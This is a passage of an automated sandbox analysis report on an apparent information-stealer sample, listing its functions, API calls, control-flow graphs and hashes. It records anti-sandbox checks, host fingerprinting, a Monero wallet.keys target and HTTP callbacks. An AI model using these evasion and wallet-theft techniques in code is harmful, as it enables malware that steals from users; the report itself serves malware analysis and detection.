                                          • Part of subcall function 004E11D0: ExitProcess.KERNEL32 ref: 004E1211
                                          • Part of subcall function 004E1160: GetSystemInfo.KERNEL32(?), ref: 004E116A
                                          • Part of subcall function 004E1160: ExitProcess.KERNEL32 ref: 004E117E
                                          • Part of subcall function 004E1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 004E112B
                                          • Part of subcall function 004E1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 004E1132
                                          • Part of subcall function 004E1110: ExitProcess.KERNEL32 ref: 004E1143
                                          • Part of subcall function 004E1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004E123E
                                          • Part of subcall function 004E1220: __aulldiv.LIBCMT ref: 004E1258
                                          • Part of subcall function 004E1220: __aulldiv.LIBCMT ref: 004E1266
                                          • Part of subcall function 004E1220: ExitProcess.KERNEL32 ref: 004E1294
                                          • Part of subcall function 004F6A10: GetUserDefaultLangID.KERNEL32 ref: 004F6A14
                                          • Part of subcall function 004E1190: ExitProcess.KERNEL32 ref: 004E11C6
                                          • Part of subcall function 004F79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004E11B7), ref: 004F7A10
                                          • Part of subcall function 004F79E0: RtlAllocateHeap.NTDLL(00000000), ref: 004F7A17
                                          • Part of subcall function 004F79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 004F7A2F
                                          • Part of subcall function 004F7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004F7AA0
                                          • Part of subcall function 004F7A70: RtlAllocateHeap.NTDLL(00000000), ref: 004F7AA7
                                          • Part of subcall function 004F7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 004F7ABF
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01459130,?,005010F4,?,00000000,?,005010F8,?,00000000,00500AF3), ref: 004F6D6A
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004F6D88
                                        • CloseHandle.KERNEL32(00000000), ref: 004F6D99
                                        • Sleep.KERNEL32(00001770), ref: 004F6DA4
                                        • CloseHandle.KERNEL32(?,00000000,?,01459130,?,005010F4,?,00000000,?,005010F8,?,00000000,00500AF3), ref: 004F6DBA
                                        • ExitProcess.KERNEL32 ref: 004F6DC2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                        • String ID:
                                        • API String ID: 2525456742-0
                                        • Opcode ID: cf548abfbf47af6e0080beb81f26d5318190af3567bc217d24e71be74eeb4cf5
                                        • Instruction ID: 50fa25dff04b7278d9edade752e36f0def95a97dbe6e324aa27de2d4ac1877b7
                                        • Opcode Fuzzy Hash: cf548abfbf47af6e0080beb81f26d5318190af3567bc217d24e71be74eeb4cf5
                                        • Instruction Fuzzy Hash: 0F3129B0A4410CABCB04FBA2DC56BFE7739AF44305F00491EF31666192DF786A05C66A
                                        Function 004E1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1436 4e1220-4e1247 call 4f8b40 GlobalMemoryStatusEx 1439 4e1249-4e1271 call 4fdd30 * 2 1436->1439 1440 4e1273-4e127a 1436->1440 1442 4e1281-4e1285 1439->1442 1440->1442 1444 4e129a-4e129d 1442->1444 1445 4e1287 1442->1445 1447 4e1289-4e1290 1445->1447 1448 4e1292-4e1294 ExitProcess 1445->1448 1447->1444 1447->1448
                                        APIs
                                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004E123E
                                        • __aulldiv.LIBCMT ref: 004E1258
                                        • __aulldiv.LIBCMT ref: 004E1266
                                        • ExitProcess.KERNEL32 ref: 004E1294
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                        • String ID: @
                                        • API String ID: 3404098578-2766056989
                                        • Opcode ID: ba36cf47b9ceba44e64d82a6350c98d8d7e5dacb9cfcbdaf8459463678c2d800
                                        • Instruction ID: 6b8c5bf020d3ea78423040284136f2eb0d912fdf12cbc937951b4211d42fd413
                                        • Opcode Fuzzy Hash: ba36cf47b9ceba44e64d82a6350c98d8d7e5dacb9cfcbdaf8459463678c2d800
                                        • Instruction Fuzzy Hash: 54016DB0D80348BAEF10DFE5DC4ABAEBB78AB54706F20848AF704BA2D0C67C5541875D
                                        Function 004F6D93 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1450 4f6d93 1451 4f6daa 1450->1451 1453 4f6dac-4f6dc2 call 4f6bc0 call 4f5d60 CloseHandle ExitProcess 1451->1453 1454 4f6d5a-4f6d77 call 4fade0 OpenEventA 1451->1454 1459 4f6d79-4f6d91 call 4fade0 CreateEventA 1454->1459 1460 4f6d95-4f6da4 CloseHandle Sleep 1454->1460 1459->1453 1460->1451
                                        APIs
                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01459130,?,005010F4,?,00000000,?,005010F8,?,00000000,00500AF3), ref: 004F6D6A
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004F6D88
                                        • CloseHandle.KERNEL32(00000000), ref: 004F6D99
                                        • Sleep.KERNEL32(00001770), ref: 004F6DA4
                                        • CloseHandle.KERNEL32(?,00000000,?,01459130,?,005010F4,?,00000000,?,005010F8,?,00000000,00500AF3), ref: 004F6DBA
                                        • ExitProcess.KERNEL32 ref: 004F6DC2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                        • String ID:
                                        • API String ID: 941982115-0
                                        • Opcode ID: f53bcbbd507aa0a0d3b6496aa7458fbdc98678c970358bbb8f03fd94049afec2
                                        • Instruction ID: 3bbee9ce3e1700dbad8b6a19398fb3a65319fd9c4bf88c9e67c65d49d6998b10
                                        • Opcode Fuzzy Hash: f53bcbbd507aa0a0d3b6496aa7458fbdc98678c970358bbb8f03fd94049afec2
                                        • Instruction Fuzzy Hash: CBF05E70A4820DABEB04ABA0DC4ABBE3774AF84745F11861AB712A5191CBB85501CA6E
                                        Function 004E4800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004E4889
                                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 004E4899
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CrackInternetlstrlen
                                        • String ID: <
                                        • API String ID: 1274457161-4251816714
                                        • Opcode ID: 3a703bb3e4b245ae276f54db15642b8340fb5db05ba3f30aabbb3ed0beab0a77
                                        • Instruction ID: 444dcad7e38988f3c01be72451d0a302bfd6f0482484ea3dfbe101704eb56690
                                        • Opcode Fuzzy Hash: 3a703bb3e4b245ae276f54db15642b8340fb5db05ba3f30aabbb3ed0beab0a77
                                        • Instruction Fuzzy Hash: 0C2150B1D0020CABDF14DFA5E845BDD7775FB44310F108629F619A72C0DB746A05CB91
                                        Function 004F5440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 004FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004FAAF6
                                          • Part of subcall function 004E62D0: InternetOpenA.WININET(00500DFF,00000001,00000000,00000000,00000000), ref: 004E6331
                                          • Part of subcall function 004E62D0: StrCmpCA.SHLWAPI(?,0145E888), ref: 004E6353
                                          • Part of subcall function 004E62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004E6385
                                          • Part of subcall function 004E62D0: HttpOpenRequestA.WININET(00000000,GET,?,0145E208,00000000,00000000,00400100,00000000), ref: 004E63D5
                                          • Part of subcall function 004E62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004E640F
                                          • Part of subcall function 004E62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004E6421
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004F5478
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                        • String ID: ERROR$ERROR
                                        • API String ID: 3287882509-2579291623
                                        • Opcode ID: 39f2bb2082598720f917f028f9b03129cf433bfa91896686081a4fc241122a96
                                        • Instruction ID: f47ef9c405a04818c9b871237be077a7dae47cddbb9e083648904a3c7624b8a5
                                        • Opcode Fuzzy Hash: 39f2bb2082598720f917f028f9b03129cf433bfa91896686081a4fc241122a96
                                        • Instruction Fuzzy Hash: EA114F7090010CABCB14FF65D996AFD3339AF10344F40455DEB0E46492EB38AB18C65A
                                        Function 004F7A70 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004F7AA0
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F7AA7
                                        • GetComputerNameA.KERNEL32(?,00000104), ref: 004F7ABF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateComputerNameProcess
                                        • String ID:
                                        • API String ID: 1664310425-0
                                        • Opcode ID: 05535e6418eb6fd9bde163d12b814b9129f2282e1559b85a5f597dbcff0927a5
                                        • Instruction ID: ddca3441d69bf0c1762193d1acbcb12834a5c3ca122d864c31d42da08de27a9d
                                        • Opcode Fuzzy Hash: 05535e6418eb6fd9bde163d12b814b9129f2282e1559b85a5f597dbcff0927a5
                                        • Instruction Fuzzy Hash: F3016DB1A08249ABCB04CF98DD45FAEBBB8FB44711F10421AF605E2280D7B85A00CBA5
                                        Function 004E1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 004E112B
                                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 004E1132
                                        • ExitProcess.KERNEL32 ref: 004E1143
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$AllocCurrentExitNumaVirtual
                                        • String ID:
                                        • API String ID: 1103761159-0
                                        • Opcode ID: a025fcfcdefb3832c16916275a1b6d525b07fb48025cc5b62a9660b513f9d6db
                                        • Instruction ID: f4fcc59eb153109b680c0d93bad169065052fe92db05a8efb994134d0ecf9162
                                        • Opcode Fuzzy Hash: a025fcfcdefb3832c16916275a1b6d525b07fb48025cc5b62a9660b513f9d6db
                                        • Instruction Fuzzy Hash: 8CE0867098930CFBE7145B919C0AF4D7678AB44B16F104155F7097A1D0C6B82640865C
                                        Function 004E10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 004E10B3
                                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 004E10F7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocFree
                                        • String ID:
                                        • API String ID: 2087232378-0
                                        • Opcode ID: 2327276f05da13a2a4560b10a64f6afa4a20b974823742c1620f7d5dbc0a639e
                                        • Instruction ID: 6068a235b875d8290a7c21fbfab098534bb135b598a21a63edf295987e100b6f
                                        • Opcode Fuzzy Hash: 2327276f05da13a2a4560b10a64f6afa4a20b974823742c1620f7d5dbc0a639e
                                        • Instruction Fuzzy Hash: 4AF0E2B1681208BBE7189AA9AC59FAFB7ACE705B05F304549F500E7290D575AE00CAA8
                                        Function 004E1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004F7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004F7AA0
                                          • Part of subcall function 004F7A70: RtlAllocateHeap.NTDLL(00000000), ref: 004F7AA7
                                          • Part of subcall function 004F7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 004F7ABF
                                          • Part of subcall function 004F79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004E11B7), ref: 004F7A10
                                          • Part of subcall function 004F79E0: RtlAllocateHeap.NTDLL(00000000), ref: 004F7A17
                                          • Part of subcall function 004F79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 004F7A2F
                                        • ExitProcess.KERNEL32 ref: 004E11C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
